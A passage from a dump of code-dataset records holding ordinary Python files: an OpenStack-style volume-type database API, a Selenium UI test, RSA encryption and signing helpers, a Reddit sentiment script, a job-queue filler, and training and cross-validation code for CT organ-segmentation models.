x['value']\n for x in inst_type_query['extra_specs']}\n inst_type_dict['extra_specs'] = extra_specs\n return inst_type_dict\n\n\n@require_context\ndef _volume_type_get_by_name(context, name, session=None):\n result = model_query(context, models.VolumeTypes, session=session). \\\n options(joinedload('extra_specs')). \\\n filter_by(name=name). 
\\\n first()\n\n if not result:\n raise exceptions.VolumeTypeNotFoundByName(volume_type_name=name)\n\n return _dict_with_extra_specs_if_authorized(context, result)\n\n\n@require_context\ndef volume_type_get_by_name(context, name, session=None):\n \"\"\"Return a dict describing specific volume_type.\n\n :param context: The request context, for access checks.\n :param name: The name of volume type to be found.\n :returns: Volume type.\n \"\"\"\n return _volume_type_get_by_name(context, name, session)\n\n\ndef _volume_type_get_query(context, session=None, read_deleted='no'):\n query = model_query(context, models.VolumeTypes,\n session=session,\n read_deleted=read_deleted). \\\n options(joinedload('extra_specs'))\n\n if not context.is_admin:\n is_public = True\n the_filter = [models.VolumeTypes.is_public == is_public]\n query = query.filter(or_(*the_filter))\n\n return query\n\n\ndef _volume_type_get_db_object(context, id, session=None, inactive=False):\n read_deleted = \"yes\" if inactive else \"no\"\n result = _volume_type_get_query(\n context, session, read_deleted). \\\n filter_by(id=id). \\\n first()\n return result\n\n\n@require_context\ndef _volume_type_get(context, id, session=None, inactive=False):\n result = _volume_type_get_db_object(context, id, session, inactive)\n\n if not result:\n raise exceptions.VolumeTypeNotFound(volume_type_id=id)\n\n vtype = _dict_with_extra_specs_if_authorized(context, result)\n\n return vtype\n\n\n@require_context\ndef volume_type_get(context, id, inactive=False):\n \"\"\"Return a dict describing specific volume_type.\n\n :param context: The request context, for access checks.\n :param id: The id of volume type to be found.\n :returns: Volume type.\n \"\"\"\n\n return _volume_type_get(context, id,\n session=None,\n inactive=inactive)\n\n\n@require_context\ndef volume_type_delete(context, id, session):\n \"\"\"Delete a volume_type by id.\n\n :param context: The request context, for access checks.\n :param id: The id of volume type to be deleted.\n \"\"\"\n model_query(context, models.VolumeTypes, session=session, read_deleted=\"no\").\\\n filter_by(id=id). \\\n update({'deleted': True,\n 'deleted_at': timeutils.utcnow(),\n 'updated_at': literal_column('updated_at')})\n\n model_query(context, models.VolumeTypeExtraSpecs, session=session, read_deleted=\"no\"). \\\n filter_by(volume_type_id=id). 
\\\n update({'deleted': True,\n 'deleted_at': timeutils.utcnow(),\n 'updated_at': literal_column('updated_at')})\n\n\ndef is_valid_model_filters(model, filters):\n \"\"\"Return True if filter values exist on the model.\n\n :param model: a Cinder model\n :param filters: dictionary of filters\n \"\"\"\n for key in filters.keys():\n if not hasattr(model, key):\n return False\n return True\n\n\ndef _process_volume_types_filters(query, filters):\n context = filters.pop('context', None)\n\n if filters.get('is_public'):\n the_filter = [models.VolumeTypes.is_public == filters['is_public']]\n\n if filters['is_public'] and context.project_id is not None:\n projects_attr = getattr(models.VolumeTypes, 'projects')\n the_filter.append(\n projects_attr.any(project_id=context.project_id,\n deleted=0))\n\n if len(the_filter) > 1:\n query = query.filter(or_(*the_filter))\n else:\n query = query.filter(the_filter[0])\n\n if 'is_public' in filters:\n del filters['is_public']\n\n if filters:\n # Ensure that filters' keys exist on the model\n if not is_valid_model_filters(models.VolumeTypes, filters):\n return\n\n if filters.get('extra_specs') is not None:\n the_filter = []\n searchdict = filters.get('extra_specs')\n extra_specs = getattr(models.VolumeTypes, 'extra_specs')\n for k, v in searchdict.items():\n the_filter.append(extra_specs.any(key=k, value=v,\n deleted=False))\n\n if len(the_filter) > 1:\n query = query.filter(and_(*the_filter))\n else:\n query = query.filter(the_filter[0])\n del filters['extra_specs']\n query = query.filter_by(**filters)\n return query\n\n\n@require_context\ndef volume_type_get_all(context, inactive=False, filters=None,\n list_result=False):\n \"\"\"Returns a dict describing all volume_types with name as key.\n\n :param context: context to query under\n :param inactive: Pass true as argument if you want deleted volume types\n returned also.\n :param filters: dictionary of filters; values that are in lists, tuples,\n or sets cause an 'IN' operation, while exact matching\n is used for other values, see _process_volume_types_filters\n function for more information\n :param list_result: For compatibility, if list_result = True, return\n a list instead of dict.\n :returns: list/dict of matching volume types\n \"\"\"\n read_deleted = 'yes' if inactive else 'no'\n session = core.get_session()\n with session.begin():\n filters = filters or {}\n filters['context'] = context\n # Generate the query\n query = _volume_type_get_query(context, session=session,\n read_deleted=read_deleted)\n query = _process_volume_types_filters(query, filters)\n\n # No volume types would match, return empty dict or list\n if query is None:\n if list_result:\n return []\n return {}\n\n rows = query.all()\n\n if list_result:\n result = [_dict_with_extra_specs_if_authorized(context, row)\n for row in rows]\n return result\n result = {row['name']: _dict_with_extra_specs_if_authorized(context,\n row)\n for row in rows}\n return result\n\n\n@require_context\ndef _volume_type_ref_get(context, id, session=None, inactive=False):\n read_deleted = \"yes\" if inactive else \"no\"\n result = model_query(context,\n models.VolumeTypes,\n session=session,\n read_deleted=read_deleted).\\\n options(joinedload('extra_specs')).\\\n filter_by(id=id).\\\n first()\n\n if not result:\n raise exceptions.VolumeTypeNotFound(volume_type_id=id)\n\n return result\n\n\n@handle_db_data_error\n@require_admin_context\ndef volume_type_update(context, volume_type_id, values):\n \"\"\"Update volume type by volume_type_id.\n\n :param volume_type_id: id of volume type to be updated
\n :param values: dictionary of values to be updated\n :returns: updated volume type\n \"\"\"\n session = core.get_session()\n with session.begin():\n try:\n # Check it exists\n volume_type_ref = _volume_type_ref_get(context,\n volume_type_id,\n session)\n if not volume_type_ref:\n raise exceptions.VolumeTypeNotFound(volume_type_id=volume_type_id)\n\n # No description change\n if values['description'] is None:\n del values['description']\n\n # No is_public change\n if values['is_public'] is None:\n del values['is_public']\n\n # No name change\n if values['name'] is None:\n del values['name']\n else:\n # Volume type name is unique. If change to a name that\n # belongs to a different volume_type, it should be\n # prevented.\n check_vol_type = None\n try:\n check_vol_type = \\\n volume_type_get_by_name(context,\n values['name'],\n session=session)\n except exceptions.VolumeTypeNotFoundByName:\n pass\n else:\n if check_vol_type.get('id') != volume_type_id:\n raise exceptions.VolumeTypeExists(id=values['name'])\n\n volume_type_ref.update(values)\n volume_type_ref.save(session=session)\n except Exception:\n raise exceptions.VolumeTypeUpdateFailed(id=volume_type_id)\n\n return _dict_with_extra_specs_if_authorized(context, volume_type_ref)\n\n\n@require_context\ndef volume_type_project_query(context, session=None, inactive=False,\n filters=None):\n \"\"\"Get a query of volume type project.\n\n :param context: context to query under\n :param inactive: Pass true as argument if you want deleted\n volume type projects returned also.\n :param filters: dictionary of filters.\n \"\"\"\n read_deleted = \"yes\" if inactive else \"no\"\n filters = filters or {}\n return model_query(context, models.VolumeTypeProjects, session=session,\n read_deleted=read_deleted).filter_by(**filters)\n","repo_name":"lilingxing20/newcloudo2o","sub_path":"newcloudo2o/db/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":41948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"5847915722","text":"from selenium import webdriver\nfrom webdriver_manager.firefox import GeckoDriverManager\nimport time\n\nurl = \"https://the-internet.herokuapp.com/\"\n\n\ndef test_add_delete_button(url):\n driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n driver.implicitly_wait(6)\n # search for link with Add/Remove Elements\n driver.find_element_by_xpath('//div[@id=\"content\"]/ul/li[2]/a').click()\n time.sleep(3)\n\n add_button = driver.find_element_by_css_selector('#content > div > button')\n\n assert add_button\n print(\"Add button is present on the page\")\n add_button.click()\n\n # search for delete button\n del_button = driver.find_element_by_css_selector('#elements > button')\n assert del_button\n print(\"Delete button is present on the page\")\n del_button.click()\n\n driver.quit()\n print(\"Test succeeded\")\n\n\nif __name__ == '__main__':\n test_add_delete_button(url)\n","repo_name":"JackNikolson/selenium_examples","sub_path":"tests/add_remove_elements.py","file_name":"add_remove_elements.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"86724849477","text":"from Crypto import Random\nfrom Crypto.Hash import SHA\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5\nfrom Crypto.Signature import PKCS1_v1_5 as Signature_pkcs1_v1_5\nimport base64\n\n\ndef encrypt(msg, 
pub):\n rsakey = RSA.importKey(pub)\n cipher = Cipher_pkcs1_v1_5.new(rsakey)\n ciphertext = cipher.encrypt(msg.encode('utf8'))\n return base64.b64encode(ciphertext).decode('utf8')\n\n\ndef decrypt(msg, pri):\n rsakey = RSA.importKey(pri)\n cipher = Cipher_pkcs1_v1_5.new(rsakey)\n plaintext = cipher.decrypt(base64.b64decode(msg), Random.new().read)\n return plaintext.decode('utf8')\n\n\ndef sign(msg, pri):\n rsakey = RSA.importKey(pri)\n signer = Signature_pkcs1_v1_5.new(rsakey)\n digest = SHA.new()\n digest.update(msg.encode('utf8'))\n signature = signer.sign(digest)\n return base64.b64encode(signature).decode('utf8')\n\n\ndef verify_signature(msg, signature, pub):\n rsakey = RSA.importKey(pub)\n signer = Signature_pkcs1_v1_5.new(rsakey)\n digest = SHA.new()\n digest.update(msg.encode('utf8'))\n return signer.verify(digest, base64.b64decode(signature))\nimport crypt\n\nwith open('../keys/public_key_s.pem', 'r') as f:\n pub = f.read()\n\nwith open('../keys/private_key_s.pem', 'r') as f:\n pri = f.read()\n\n\nmsg = 'hello world'\nprint('origin msg: %s\\n' % msg)\n\nciphertext = crypt.encrypt(msg, pub)\nprint('get ciphertext: %s\\n' % ciphertext)\n\nplaintext = crypt.decrypt(ciphertext, pri)\nprint('get plaintext: %s\\n' % plaintext)\n\nsignature = crypt.sign(msg, pri)\nprint('get signature: %s\\n' % signature)\n\nverify = crypt.verify_signature(plaintext, signature, pub)\nprint('get verify result: %s\\n' % verify)\n","repo_name":"tw-bc-group/decentralized-smart-lock","sub_path":"LockController/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"34448122056","text":"import json\nimport _pickle as pickle\nfrom model import TBSentiment\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"reddit data go here please\")\n parser.add_argument('--data', type=str, nargs='?')\n parser.add_argument('--model', type=str, nargs='?')\n parser.add_argument('--save', type=str, nargs='?')\n args = parser.parse_args()\n\n if args.model is not None:\n print(\"loading model\")\n loader = open(args.model, 'rb')\n model_obj = pickle.load(loader)\n\n if args.data is not None:\n overall_data = {}\n\n with open(args.data, 'r') as file:\n data = json.load(file)\n print('loaded json file')\n for k, _ in data.items():\n print(k)\n overall_data[k] = {}\n \n neg_c = []\n pos_c = []\n sum_conf = 0\n\n # Classify and store comments in list\n for comment in data[k]:\n pol, con = model_obj.classify(comment)\n\n sum_conf += con\n \n if pol == 'pos':\n pos_c.append((pol, con, comment))\n elif pol == 'neg':\n neg_c.append((pol, con, comment))\n \n avg_conf = sum_conf / (len(pos_c) + len(neg_c))\n\n # Sort list by confidence\n pos_c = sorted(pos_c, key=lambda x: x[1])\n neg_c = sorted(neg_c, key=lambda x: x[1])\n\n sent_score = len(pos_c)/(len(pos_c) + len(neg_c))\n\n overall_pol = ''\n if 0.80 <= sent_score <= 1:\n overall_pol = 'very positive'\n elif 0.60 <= sent_score < 0.80:\n overall_pol = 'positive'\n elif 0.40 < sent_score < 0.60:\n overall_pol = 'neutral'\n elif 0.20 < sent_score <= 0.40:\n overall_pol = 'negative'\n else:\n overall_pol = 'very negative'\n\n print('overall sentiment:', overall_pol, sent_score)\n print(\"average confidence:\", avg_conf)\n\n #print('most positive comments:', top_pos)\n #print('most negative comments:', top_neg)\n\n overall_data[k]['sentiment'] = overall_pol\n overall_data[k]['confidence'] = avg_conf\n 
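# store ten comments per polarity; note pos_c and neg_c were sorted ascending by confidence above\n                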
overall_data[k]['top_pos'] = pos_c[:10]\n overall_data[k]['top_neg'] = neg_c[:10]\n\n with open(args.save, 'w') as file:\n json.dump(overall_data, file)\n else:\n print('needs a model')\n","repo_name":"seanerice/college-sentiment","sub_path":"models/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36115187688","text":"from rq import Queue\nfrom redis import Redis\nimport pandas as pd\nimport click\n\nfrom pacstools.job import program_args\n\n\ndef fill(file):\n redis_con = Redis()\n q = Queue(connection=redis_con)\n df = pd.read_csv(file)\n df = df[20:101]\n for row in df.itertuples():\n q.enqueue(\n program_args,\n timeout='10m',\n patient_id=row.PatientID,\n accession_number=str(row.AccessionNumber),\n study_instance_uid=row.StudyInstanceUID,\n output_dir='/data/projects/federau')\n\n\n@click.command()\n@click.argument('file')\ndef run(file):\n fill(file)\n\nif __name__ == '__main__':\n run()","repo_name":"joshy/pacstools","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1130788119","text":"from audioop import cross\nimport matplotlib.pyplot as plt\nimport os\nimport shutil\nimport pathlib\nimport glob\nimport pickle\nimport numpy as np\nimport random\nimport math\nimport torch \nimport torch.nn as nn\nimport torchvision\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data import random_split, dataset \nfrom shapely.geometry import Point\nimport torch.nn.functional as F\nimport DicomParsing\nimport Model\nimport Test\nfrom Dataset import CTDataset\nimport albumentations as A \nimport subprocess\nfrom PostProcessing import ThresholdRescaler\nimport re\nimport statistics\nimport Predict\n\ndef Check_Cross_Validation_Stats(organ, epochs=20, path=None, model_type='MultiResUNet', fold=5):\n \"\"\"\n Calculates the statistics from the previous cross validation performed on the specified organ with the specified model type and fold number.\n organ (str): the organ to check statistics on \n path (str): path of the main directory for organogenesis (default None if currently in)\n model_type (str): type of network architecture used for training\n fold (int): fold of k-fold cross validation used\n \"\"\"\n #1. 
Divide the data into the k groups of train/validation data\n\n if path == None:\n path = os.getcwd()\n\n patients_folder = os.path.join(path, \"Patient_Files\")\n \n current_fold=0\n cross_val_idx=None \n while current_fold < fold:\n current_fold +=1 \n if organ == \"Tubarial\":\n val_list =DicomParsing.GetTrainingData_Tubarial(patients_folder, path, cross_val=True, fold=[fold, current_fold])\n else: \n val_list = DicomParsing.GetTrainingData(patients_folder, organ, path, cross_val=True, fold=[fold, current_fold]) #go through all the dicom files and create the imagesval_list = DicomParsing.GetTrainingData(patients_folder, organ, path, cross_val=True, fold=[fold, current_fold]) #go through all the dicom files and create the images\n # #val_list = [\"CT_140453\", \"CT_142932\", \"CT_143029\", \"CT_143516\"] \n #val_list = [\"CT_140453\"]\n #val_list = [\"CT_163329\"]\n #val_list = [\"CT_151203\"]\n\n if model_type.lower() == \"unet\":\n model = Model.UNet()\n elif model_type.lower() == \"multiresunet\": \n model = Model.MultiResUNet()\n\n epoch_val=epochs-1 \n loaded=False \n while epoch_val > 0 and loaded == False:\n\n try:\n model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(current_fold) + \"_\" + str(epoch_val) + \".pt\")) \n model.load_state_dict(torch.load(model_path))\n loaded = True\n except:\n epoch_val -= 1 \n torch.save(model.state_dict(), os.path.join(path, \"Models\", organ, \"Model_\" + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \".pt\"))\n\n \n\n intercept = ThresholdRescaler(organ, model_type, path=None)\n #save intercept for cross val\n saveFileName = str(current_fold) + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_rescale_intercept.txt\" \n with open(os.path.join(path, \"Models\", organ, \"Scaling_Factors\", saveFileName ), 'wb') as pick:\n pickle.dump(intercept, pick) \n\n thres = Test.BestThreshold(organ, path, model_type, val_list, intercept=intercept)\n with(open(os.path.join(path, \"Models\", organ, \"Scaling_Factors\", str(current_fold) + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_Thres.txt\"),'wb')) as fp:\n pickle.dump(thres, fp)\n\n \n eval_data = Test.GetEvalData(organ,path,thres, model_type, intercept, val_list)\n f_score = eval_data[\"F Score\"] \n haus = eval_data[\"Hausdorff\"]\n jaccard = eval_data[\"Jaccard Score\"]\n eval_data_path = os.path.join(path, \"Models\", organ, \"Statistics\",\"Eval_Data\", \"Eval_Data_CV\" + str(current_fold) + \".txt\")\n with open(eval_data_path, \"wb\") as fp:\n pickle.dump(eval_data, fp)\n #save the list of validation files used in the current fold\n with open(os.path.join(path, \"Models\", organ, \"CV_Models\", str(current_fold) + \"_val_list\"), \"wb\") as fp:\n pickle.dump(val_list, fp) \n\n print(f'CV{current_fold}: F-Score: {f_score} ; H: {haus} ; J: {jaccard}') \n \n #load all the f scores and hausdorff distances and take average\n eval_path = os.path.join(path, \"Models\", organ, \"Statistics\",\"Eval_Data\")\n\n eval_files = os.listdir(eval_path)\n f_scores = [] #dice similarity coefficient \n hauses = [] #95th percentile Hausdorff\n jacs = [] #jaccard index\n for f in eval_files:\n with open(os.path.join(eval_path, f), \"rb\") as fp:\n score = pickle.load(fp)\n f_scores.append(score[\"F Score\"])\n jacs.append(score[\"Jaccard Score\"])\n hauses.append(score[\"Hausdorff\"])\n \n \n avg_f = statistics.mean(f_scores)\n avg_h = statistics.mean(hauses)\n avg_j = 
statistics.mean(jacs)\n std_f = statistics.stdev(f_scores)\n std_h = statistics.stdev(hauses)\n std_j = statistics.stdev(jacs)\n\n eval_stats = {}\n eval_stats[\"F_Score\"] = [avg_f, std_f, f_scores]\n eval_stats[\"Hausdorff\"] = [avg_h, std_h, hauses]\n eval_stats[\"Jaccard\"] = [avg_j, std_j, jacs]\n eval_path = os.path.join(path, \"Models\", organ, \"Statistics\", \"Eval_Stats\" + \".txt\")\n\n with open(eval_path, \"wb\") as fp:\n pickle.dump(eval_stats, fp)\n \n\n print(f\"CV Results: \\n F-Score: {avg_f} += {std_f} \\n 95 percentile Hausdorff distance: {avg_h} += {std_h}\\n Jaccard Index: {avg_j} +- += {std_j}\") \n\ndef CrossValidate(organ, epochs=15, lr=1e-3, path=None, model_type='MultiResUNet', fold=5, data_augmentation=True, continue_previous=False):\n \"\"\"\n Performs a k-fold cross validation of the selected model type and organ.\n folds are created by linear iteration through N / k groups of patients, \n with one group comprising the validation set in each. \n Args:\n organ (str): the organ to train the model on \n epochs (int): number of epochs to train each model with in each fold\n lr (float): learning rate to use during optimization\n modelType (str): type of neural network architecture to use for training\n dataAugmentation (bool): True if augmentation transforms are to be applied during training\n\n \"\"\"\n \n\n\n if path == None:\n path = os.getcwd()\n\n patients_folder = os.path.join(path, \"Patient_Files\") \n\n current_fold = 0\n first_iter=True\n while current_fold < fold:\n current_fold +=1\n # if current_fold == 2:\n # continue\n if continue_previous and first_iter: \n #if carrying off on previously started cv, need to see which fold currently on\n cv_path = os.path.join(path, \"Models\", organ, \"CV_Models\")\n num_files = len(os.listdir(cv_path))\n current_fold = int(num_files / epochs) + 1\n \n print(f\"continuing cross validation on fold {current_fold} and epoch {num_files % epochs}\") \n\n print(f\"Beginning fold # {current_fold}\")\n if organ == \"Tubarial\":\n val_list =DicomParsing.GetTrainingData_Tubarial(patients_folder, path, cross_val=True, fold=[fold, current_fold])\n else: \n val_list = DicomParsing.GetTrainingData(patients_folder, organ, path, cross_val=True, fold=[fold, current_fold]) #go through all the dicom files and create the images\n\n\n if continue_previous and first_iter:\n Train(organ,epochs,lr, path, modelType=model_type, processData=False, dataAugmentation=data_augmentation, cross_val_idx=current_fold, loadModel=True)\n first_iter=False #ensure this only happens once\n else:\n Train(organ,epochs,lr, path, modelType=model_type, processData=False, dataAugmentation=data_augmentation, cross_val_idx=current_fold, loadModel=False)\n epoch_val=epochs-1 \n #save the model to the main folder so its there to compute intercept \n model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(current_fold) + \"_\" + str(epoch_val) + \".pt\")) \n if model_type.lower() == \"unet\":\n model = Model.UNet()\n elif model_type.lower() == \"multiresunet\": \n model = Model.MultiResUNet()\n model.load_state_dict(torch.load(model_path))\n torch.save(model.state_dict(), os.path.join(path, \"Models\", organ, \"Model_\" + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \".pt\"))\n\n intercept = ThresholdRescaler(organ, model_type, path=None)\n #save intercept for cross val\n saveFileName = str(current_fold) + model_type.lower() + \"_\" + 
organ.replace(\" \", \"\") + \"_rescale_intercept.txt\" \n with open(os.path.join(path, \"Models/\", organ, \"Scaling_Factors\", saveFileName ), 'wb') as pick:\n pickle.dump(intercept, pick) \n thres = Test.BestThreshold(organ, path, model_type, val_list, intercept=intercept)\n with(open(os.path.join(path, \"Models\", organ, \"Scaling_Factors\", str(current_fold) + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_Thres.txt\"),'wb')) as fp:\n pickle.dump(thres, fp)\n \n #Predict.GetMultipleContours([organ], val_list ,path = None, thresholdList = [thres]*len(val_list), modelTypeList = [\"multiresunet\"]*len(val_list), withReal=False, tryLoad=False, save=True)\n eval_data = Test.GetEvalData(organ,path,thres, model_type, val_list)\n f_score = eval_data[\"F Score\"] \n haus = eval_data[\"Hausdorff\"]\n jaccard = eval_data[\"Jaccard Score\"]\n eval_data_path = os.path.join(path, \"Models\", organ, \"Statistics\",\"Eval_Data\", \"Eval_Data_CV\" + str(current_fold) + \".txt\")\n with open(eval_data_path, \"wb\") as fp:\n pickle.dump(eval_data, fp)\n\n print(f'CV{current_fold}: F-Score: {f_score} ; H: {haus} ; J: {jaccard}') \n \n #load all the f scores and hausdorff distances and take average\n eval_path = os.path.join(path, \"Models\", organ, \"Statistics\",\"Eval_Data\")\n\n eval_files = os.listdir(eval_path)\n f_scores = [] #dice similarity coefficient \n hauses = [] #95th percentile Hausdorff\n jacs = [] #jaccard index\n for f in eval_files:\n with open(os.path.join(eval_path, f), \"rb\") as fp:\n score = pickle.load(fp)\n f_scores.append(score[\"F Score\"])\n jacs.append(score[\"Jaccard Score\"])\n hauses.append(score[\"Hausdorff\"])\n \n \n avg_f = statistics.mean(f_scores)\n avg_h = statistics.mean(hauses)\n avg_j = statistics.mean(jacs)\n std_f = statistics.stdev(f_scores)\n std_h = statistics.stdev(hauses)\n std_j = statistics.stdev(jacs)\n eval_stats = {}\n eval_stats[\"F_Score\"] = [avg_f, std_f, f_scores]\n eval_stats[\"Hausdorff\"] = [avg_h, std_h, hauses]\n eval_stats[\"Jaccard\"] = [avg_j, std_j, jacs]\n eval_path = os.path.join(path, \"Models\", organ, \"Statistics\", \"Eval_Stats\" + \".txt\")\n\n with open(eval_path, \"wb\") as fp:\n pickle.dump(eval_stats, fp)\n \n\n print(f\"CV Results: \\n F-Score: {avg_f} +- {std_f}\\n 95 percentile Hausdorff distance: {avg_h} +-{std_h}\\n Jaccard Index: {avg_j}+-{std_j}\") \n\n\n\ndef Train(organ,numEpochs,lr, path, modelType, processData=True, loadModel=False, sortData=False, preSorted=False, dataAugmentation=True, cross_val_idx=None):\n \"\"\"Trains a model for predicting contours on a given organ. Saves the model \n and loss history after each epoch. Stops training after a given number of\n epochs or when the validation loss has decreased by less than 0.001 for \n 4 consecutive epochs. 
\n\n Args:\n organ (str): the organ to train the model on \n numEpochs (int, str): the number of epochs to train for\n lr (float, str): the learning rate to train with\n path (str): the path to the directory containing organogenesis folders \n (Models, Processed_Data, etc.)\n processData (bool): True to process the data into training/testing/\n validation folders, False if they are already processed\n loadModel (bool): True to load a model and continue training, \n False to train a new model\n modelType (str): the type of model to be used in training \n sortData (bool): True to visually inspect contours for quality \n assurance, False to process data without looking at contours\n preSorted(bool): True to use presorted good/bad/no contour lists, \n False to display contours for each patient and sort manually\n dataAugmentation (bool): True to turn on data augmentation for \n training, False to use non-augmented CT images.\n cross_val_idx (optional int): in cases where models are trained in a cross validation loop, saved weights need to include the index of the current CV iteration \n \"\"\"\n #First extract patient training data and process it for each, saving it into Processed_Data folder\n torch.cuda.empty_cache()\n dataPath = 'Processed_Data/' + organ + \"/\"\n if path==None: #if a path to data was not supplied, assume that patient data has been placed in the Patient_Files folder in the current directory. \n path = pathlib.Path(__file__).parent.absolute() \n patientsPath = 'Patient_Files/'\n filesFolder = os.path.join(pathlib.Path(__file__).parent.absolute(), patientsPath)\n dataFolder = os.path.join(pathlib.Path(__file__).parent.absolute(), dataPath) #this gives the absolute folder reference of the datapath variable defined above\n if processData:\n DicomParsing.GetTrainingData(filesFolder, organ,path, sortData, preSorted) #go through all the dicom files and create the images\n print(\"Data Processed\")\n \n else: \n folderScriptPath = os.path.join(pathlib.Path(__file__).parent.absolute(), \"FolderSetup.sh\")\n filesFolder = path\n modelPath = os.path.join(pathlib.Path(__file__).parent.absolute(), \"Models\")\n dataFolder = os.path.join(path, dataPath) \n #Now if a path has been specified, then the Model folder must be in this path as well. \n #check for the model path: \n #Furthermore, if processData is false, then there must exist the Processed_Data folder\n if not processData:\n dataPath = os.path.join(path, \"Processed_Data\")\n if not os.path.isdir(dataPath): #If the processedData folder doesnt exist, then itll have to be made and data processed.\n processData=True\n preSorted=False \n dataErrorMessage = \"Processed_Data directory was not found in the provided path. 
Data will have to be processed.\\n \\\n press enter to continue\"\n while True: #wait for user input \n try:\n input = input(dataErrorMessage)\n if input == \"\":\n break\n except KeyboardInterrupt:\n quit() \n except: pass \n #Now run the FolderSetup.sh Script in the given directory to make sure all directories are present\n shutil.copy('FolderSetup.sh', path)\n os.chdir(path)\n subprocess.call(['sh', './FolderSetup.sh']) \n DicomParsing.GetTrainingData(filesFolder, organ, preSorted, path) #go through all the dicom files and create the images\n print(\"Data Processed\")\n else:\n shutil.copy(folderScriptPath, path)\n os.chdir(path) \n DicomParsing.GetTrainingData(filesFolder, organ, path, sortData, preSorted) #go through all the dicom files and create the images\n subprocess.call(['sh', './FolderSetup.sh']) \n print(\"Data Processed\")\n\n #See if cuda is available, and set the device as either cuda or cpu if is isn't available\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"\\nDevice being used for training: \" + device.type)\n #Now define or load the model and optimizer: \n epochLossHistory = []\n trainLossHistory = []\n if modelType.lower() == \"unet\":\n model = Model.UNet()\n elif modelType.lower() == \"multiresunet\": \n model = Model.MultiResUNet()\n if loadModel == True:\n #load the model state dict for the last epoch:\n if type(cross_val_idx) == int:\n models_path = os.path.join(path, \"Models\", organ, \"CV_Models\")\n cv_model_files = sorted(os.listdir(models_path))\n cv_model_files = list(filter(lambda val: f\"CV{cross_val_idx}\" in val, cv_model_files))\n if len(cv_model_files) > 0:\n nums = [int(i) for i in cv_model_files[-1] if i.isdigit()]\n current_epoch = int(str(nums[-2]) + str(nums[-1])) + 1\n if current_epoch != numEpochs:\n model.load_state_dict(torch.load(os.path.join(models_path, cv_model_files[-1]))) \n #get current epoch: \n print(f\"loaded model weights for {cv_model_files[-1]}. Continuing training on Epoch {current_epoch}\")\n else: \n return #if already fully trained on this fold \n else:\n current_epoch = 0 \n\n # try:\n # model.load_state_dict(torch.load(os.path.join(models_path, \"Model_multiresunet_\" + organ.replace(\" \", \"\") + \"_CV\" + str(cross_val_idx) + \"_\" + current_epoch + \".pt\" ))) \n # print(\"loaded cv model\")\n # except:\n # print(f\"Could not find a pre-existing model to load for CV {cross_val_idx} and epoch {current_epoch}...\") \n else: \n models_path = os.path.join(path, \"Models\", organ, \"Epoch_Models\")\n epoch_model_files = sorted(os.listdir(models_path))\n model.load_state_dict(torch.load(os.path.join(models_path, epoch_model_files[-1]))) \n nums = [int(i) for i in epoch_model_files[-1].split() if i.isdigit()]\n current_epoch = int(str(nums[-2]) + str(nums[-1]))+1\n print(f\"loaded model weights for {epoch_model_files[-1]}. 
Continuing training on Epoch {current_epoch}\")\n try: #try to load lists which are keeping track of the loss over time\n \n if type(cross_val_idx) == int:\n epochLossHistory = pickle.load(open(os.path.join(path, \"Models\", organ, \"CV\" + str(cross_val_idx) + \"_\" + modelType.lower() + \"_\" + \"epochLossHistory\" + \".txt\"), \"rb\"))\n print(\"Loaded epoch loss history for previous training of cross validation model...\")\n else:\n print(\"Loaded epoch loss history for previous training of model...\")\n epochLossHistory = pickle.load(open(os.path.join(path, \"Models\", organ, modelType.lower() + \"_\" + \"epochLossHistory.txt\"), 'rb')) \n except:\n \n epochLossHistory = []\n else:\n current_epoch=0 \n\n trainLossHistory = [] \n model.to(device) #put the model onto the GPU \n optimizer = torch.optim.Adam(model.parameters(), lr)\n\n \n dataFiles = sorted(os.listdir(dataFolder))\n\n #set transform = transform for data augmentation, None for no augmentation\n if dataAugmentation == True:\n transform = A.Compose ([\n A.OneOf([A.Perspective(scale=(0.05,0.1), keep_size = True, pad_mode = 0, fit_output = True, p=0.5), A.ElasticTransform(p=0.5, alpha=16, sigma=512*0.05, alpha_affine=512*0.03),\n #A.GaussNoise(var_limit = 0.05, p = 0.5)\n ], p =0.5),\n #A.OneOf([A.VerticalFlip(p=0.5), A.HorizontalFlip(p=0.5), A.Rotate(5, p=0.5)], p=0.5)\n ])\n else:\n transform = None\n\n \n iteration = 0\n #Criterion = F.binary_cross_entropy_with_logits()#nn.BCEWithLogitsLoss() I now just define this in the model\n epoch_range = range(current_epoch, numEpochs)\n for epoch in epoch_range:\n print(f\"Beginning epoch {epoch} of a \" + modelType + \" \" + organ + \" model\") \n model.train() #put model in training mode\n\n #creates the training dataset \n #set transform = transform for data augmentation, None for no augmentation\n train_dataset = CTDataset(dataFiles = dataFiles, root_dir = dataFolder, transform = transform)\n\n #creates the training dataloader \n train_loader = DataLoader(dataset = train_dataset, batch_size = 1, shuffle = True)\n\n \n #go through all of the images in the data set \n for i, (image, mask) in enumerate(train_loader): 